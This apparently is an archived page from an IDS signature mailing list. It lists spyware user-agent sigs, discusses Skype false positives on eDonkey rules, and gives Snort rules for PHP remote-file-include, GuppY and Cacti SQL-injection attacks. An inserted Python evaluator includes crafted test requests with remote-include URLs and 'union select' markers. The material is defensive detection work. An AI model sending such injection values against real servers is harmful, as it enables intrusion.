Cranked out a bunch of sigs for spyware, mostly from the spyware
listening post data. Proving to be very useful, if not overwhelming.
Also got some new stuff from a Checkpoint page:
http://www.checkpoint.com/securitycafe/readingroom/web_security/top_10_spyware_sites.html
There are a number there we don't have coverage for. If you're looking
to learn something about the spyware sigs, go to one of those sites in
vmware and wireshark the traffic, and install whatever they push.
Here are the new ones today:
2003335 || BLEEDING-EDGE MALWARE 2search.org User Agent (2search)
2003336 || BLEEDING-EDGE MALWARE AntiVermins.com Fake Antispyware Package User Agent
2003337 || BLEEDING-EDGE MALWARE www.paretologic.com Suspect Anti-Spyware AutoUpdate User Agent (Autoupdate)
2003338 || BLEEDING-EDGE MALWARE Paretologic Xoftspy Fake Antispyware Update
2003339 || BLEEDING-EDGE MALWARE Paretologic Xoftspy Fake Antispyware Update
2003340 || BLEEDING-EDGE MALWARE Baidu.com Spyware Bar Reporting || url,www.pctools.com/mrc/infections/id/BaiDu/
2003341 || BLEEDING-EDGE MALWARE Baidu.com Spyware Bar Pulling Content || url,www.pctools.com/mrc/infections/id/BaiDu/
2003342 || BLEEDING-EDGE MALWARE www.baidu.com Spyware User Agent (bar-get)
2003343 || BLEEDING-EDGE MALWARE CNSMin Spyware User Agent (CnsMin Agent)
2003344 || BLEEDING-EDGE MALWARE Trinityacquisitions.com and Maximumexperience.com Spyware Activity
2003345 || BLEEDING-EDGE MALWARE Download UBAgent User Agent - lop.com and other spyware || url,www.spywareinfo.com/articles/lop/
2003346 || BLEEDING-EDGE MALWARE Errorsafe.com Fake antispyware User Agent (ErrorSafe Updater) || url,www.spywareinfo.com/articles/lop/
2003347 || BLEEDING-EDGE MALWARE Gamehouse.com User Agent (GAMEHOUSE.NET.URL) || url,www.spywareinfo.com/articles/lop/
2003348 || BLEEDING-EDGE MALWARE Gamehouse.com Activity || url,www.gamehouse.com
--
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------
PGP: http://www.bleedingthreats.com/mattjonkman.asc
Thread at a glance:
Previous Message by Date:
Re: Stormy P2P bot Sigs -- may be SKYPE ?
Matt Jonkman wrote:
> Russell Fulton wrote:
>
>> Hmmmm... My edonkey alerts have gone crazy recently. I know that at
>> least some of the machines (the ones I checked ) are not doing any p2p
>> file sharing, nor is there any signs of infection or compromise. All 3
>> however were running Skype. Is it possible that changes have been made
>> to the skype protocol which results in a lot of packets with 0XE3 at the
>> start?
>>
>
> Looked into some basic skype pcaps and they shouldn't be triggering the
> edonkey sigs. Could skype be using edonkey to pull updates or something?
>
> Could you turn off skype on a few of those and see if the hits persist?
>
We don't have direct control of the machines and skype is perfectly
legal on our network. I'll examine my argus logs and see if I can get
something that I can positively identify as SKYPE. There are a few
IPs that they contact at the start of a session IIRC.
Russell
Next Message by Date:
Re: Stormy P2P bot Sigs -- may be SKYPE ?
Those rules are new... but on the flip side, I've not been able to get
them to trip on intentional skype traffic here.
I am wondering more if skype is using edonkey to pull updates or
something, but my client isn't needing an update?
Matt
Russell Fulton wrote:
>
> Matt Jonkman wrote:
>> Ummm... that's a little scary.
>>
>> To be honest, when I was looking at those stormy variants the traffic
>> didn't exactly conform to edonkey, but was close. It's VERY possible it
>> may have been skype and I've written for the wrong protocol.
>>
>> Let me look into it and see what'll match. Anyone else seeing skype hits?
>>
>
> I've just followed up another machine that was getting lots of hits.
> This machine belongs to a senior physics professor who I have known for
> years. There is no Edonkey or other file sharing p2p software on the
> box and since it is a Mac it is unlikely to be infected with peacomm ;)
> and he was using SKYPE at the time of my alerts.
>
> I suspect that the p2p rules are not widely used and those that do
> monitor for p2p also ban SKYPE which we don't.
>
> What puzzles me is why this has just started happening -- or are these
> rules new?
>
>
> Russell.
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
--
Matthew Jonkman
Bleeding Edge Threats
Previous Message by Thread:
New Web Sigs
David Maciejak has been busy this morning. Four new sigs out. Thanks David.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE EXPLOIT GuppY error.php POST Arbitrary Remote Code Execution"; flow: to_server,established; content:"POST"; depth:4; nocase; uricontent:"/error.php?"; nocase; uricontent:"err="; nocase; pcre:"/Cookie\:\ +REMOTE_ADDR=/i"; reference:bugtraq,15609; classtype:web-application-attack; sid:2003332; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB PHP Generic membreManager.php remote file include"; flow:established,to_server; uricontent:"/membres/membreManager.php"; nocase; pcre:"/include_path=\s*(ftp|https?)\:\//Ui"; reference:bugtraq,22287; classtype:web-application-attack; sid:2003331; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB PHP Gnopaster Common.php remote file include"; flow:established,to_server; uricontent:"/includes/common.php"; nocase; pcre:"/root_path=\s*(ftp|https?)\:\//Ui"; reference:bugtraq,18180; classtype:web-application-attack; sid:2003333; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB Cacti cmd.php Remote Arbitrary SQL Command Execution Attempt"; flow:to_server,established; uricontent:"/cmd.php?"; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; reference:cve,CVE-2006-6799; reference:bugtraq,21799; classtype:web-application-attack; sid:2003334; rev:1;)
--
Matthew Jonkman
Bleeding Edge Threats
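Added example, not code from this list or from the Bleeding Edge rule set: a small Python evaluator that implements just enough of Snort's option semantics to show what the four web rules above (sids 2003331-2003334) actually look for, and, for the spyware sigs in the first message, how a User-Agent-based sig is tripped. It covers content/uricontent (every posted rule uses nocase, so all string matches here are case-insensitive), the depth modifier, and pcre with the U (match the URI) and i flags; flow: is ignored, and there is no HTTP normalisation, stream reassembly or flowbit handling. The four regexes are transcribed from the posted pcre options. The spyware rule bodies are not on this page, so the 2003342 entry, modelled as a plain User-Agent substring match on the "bar-get" token from the sig name, is an assumption. The sample requests are constructed (203.0.113.0/24 is a documentation range) and carry no exploit payload, only the markers the rules key on.

```python
"""Toy evaluator for the Snort rule options used in the sigs on this page.

Added example, not Bleeding Edge Threats code.  It ANDs a rule's options the
way Snort does, but supports only: content (with optional depth),
uricontent, pcre with the U and i flags, and a User-Agent header check.
"""
import re
from typing import Dict, List, Tuple


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.x request into (method, uri, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers, body.decode("latin-1")


# Option keywords and their operands:
#   ("content", (string, depth|None))  raw payload, optionally only the first N bytes
#   ("uricontent", string)             request URI only
#   ("pcre", (regex, on_uri))          on_uri=True models the U flag
#   ("user_agent", string)             assumed form of the spyware UA sigs
RULES = [
    {"sid": 2003332, "msg": "GuppY error.php POST Arbitrary Remote Code Execution",
     "checks": [("content", ("POST", 4)),
                ("uricontent", "/error.php?"),
                ("uricontent", "err="),
                ("pcre", (re.compile(r"Cookie: +REMOTE_ADDR=", re.I), False))]},
    {"sid": 2003331, "msg": "PHP Generic membreManager.php remote file include",
     "checks": [("uricontent", "/membres/membreManager.php"),
                ("pcre", (re.compile(r"include_path=\s*(ftp|https?):/", re.I), True))]},
    {"sid": 2003333, "msg": "PHP Gnopaster Common.php remote file include",
     "checks": [("uricontent", "/includes/common.php"),
                ("pcre", (re.compile(r"root_path=\s*(ftp|https?):/", re.I), True))]},
    {"sid": 2003334, "msg": "Cacti cmd.php Remote Arbitrary SQL Command Execution Attempt",
     "checks": [("uricontent", "/cmd.php?"),
                ("uricontent", "UNION"),
                ("uricontent", "SELECT")]},
    # Assumption: the real body of sid 2003342 is not on the page; this models it
    # as a case-insensitive substring match on the "bar-get" User-Agent token.
    {"sid": 2003342, "msg": "www.baidu.com Spyware User Agent (bar-get)",
     "checks": [("user_agent", "bar-get")]},
]


def rule_matches(rule: dict, raw: bytes) -> bool:
    """True only when every option in the rule matches (Snort ANDs the options)."""
    _method, uri, headers, _body = parse_request(raw)
    payload = raw.decode("latin-1")
    for kind, arg in rule["checks"]:
        if kind == "content":
            needle, depth = arg
            haystack = payload if depth is None else payload[:depth]
            ok = needle.lower() in haystack.lower()
        elif kind == "uricontent":
            ok = arg.lower() in uri.lower()
        elif kind == "pcre":
            regex, on_uri = arg
            ok = regex.search(uri if on_uri else payload) is not None
        elif kind == "user_agent":
            ok = arg.lower() in headers.get("user-agent", "").lower()
        else:
            raise ValueError(f"unknown option {kind}")
        if not ok:
            return False
    return True


def evaluate(raw: bytes) -> List[int]:
    """Return the sids of every rule the request trips, in RULES order."""
    return [r["sid"] for r in RULES if rule_matches(r, raw)]


# Constructed sample requests; they carry only the markers the rules key on.
GUPPY_POST = (b"POST /error.php?err=1 HTTP/1.1\r\nHost: www.example.com\r\n"
              b"Cookie: REMOTE_ADDR=1\r\nContent-Length: 0\r\n\r\n")
MEMBRE_RFI = (b"GET /membres/membreManager.php?include_path=http://203.0.113.5/x "
              b"HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
GNOPASTER_RFI = (b"GET /includes/common.php?root_path=ftp://203.0.113.5/y "
                 b"HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
CACTI_SQLI = (b"GET /cmd.php?1+union+select+1,2 HTTP/1.1\r\n"  # lowercase: nocase still fires
              b"Host: www.example.com\r\n\r\n")
BAIDU_BAR = b"GET /bar/update HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: bar-get\r\n\r\n"
# Same cookie and URI as the GuppY request, but a GET: content:"POST"; depth:4 fails.
BENIGN_GET = (b"GET /error.php?err=404 HTTP/1.1\r\nHost: www.example.com\r\n"
              b"Cookie: REMOTE_ADDR=1\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("GUPPY_POST", GUPPY_POST), ("MEMBRE_RFI", MEMBRE_RFI),
                      ("GNOPASTER_RFI", GNOPASTER_RFI), ("CACTI_SQLI", CACTI_SQLI),
                      ("BAIDU_BAR", BAIDU_BAR), ("BENIGN_GET", BENIGN_GET)]:
        print(f"{name:14s} -> {evaluate(req)}")
```

Two things worth noticing when you run it: the Cacti rule fires on lowercase "union select" because every uricontent in the posted rule carries nocase, and the GuppY rule stays quiet on a GET that otherwise has the same URI and cookie, because depth:4 pins the "POST" match to the first four bytes of the request.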
Next Message by Thread:
IDS Policy Manager v2.0.2 Released
From the Activeworx guys:
Activeworx is happy to announce the release of IDS Policy Manager
v2.0.2. This completely free tool has been updated to expand on its
already feature rich interface to add more usability features and
support for Snort v2.7beta.
Partial list of changes since 2.0.1:
o. Added - Support for Snort v2.7beta.
o. Added - Show differences between rules when updating rules.
o. Added - Stream 5 support.
o. Added - Local script arguments.
o. Added - Import configuration options/rules from a text box.
o. Added - Ability to quickly open selected rule for all policies.
o. Added - Additional checks to make sure user is entering required
values for rules, sensors, groups, etc.
For more information and to download IDS Policy Manager for free, please
visit:
http://www.activeworx.org/
--
Matthew Jonkman
Bleeding Edge Threats